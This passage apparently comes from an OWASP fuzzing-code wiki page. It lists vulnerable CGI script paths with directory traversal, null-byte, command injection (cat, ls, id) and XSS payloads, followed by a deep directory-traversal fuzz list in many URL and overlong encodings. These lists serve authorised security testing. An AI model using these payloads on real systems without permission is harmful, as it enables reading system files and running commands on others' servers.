search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
